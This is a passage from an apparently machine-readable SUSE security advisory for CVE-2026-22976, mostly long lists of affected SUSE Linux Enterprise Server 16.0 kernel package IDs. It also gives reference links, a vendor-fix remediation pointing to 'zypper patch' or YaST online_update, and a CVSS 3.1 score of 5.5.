"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
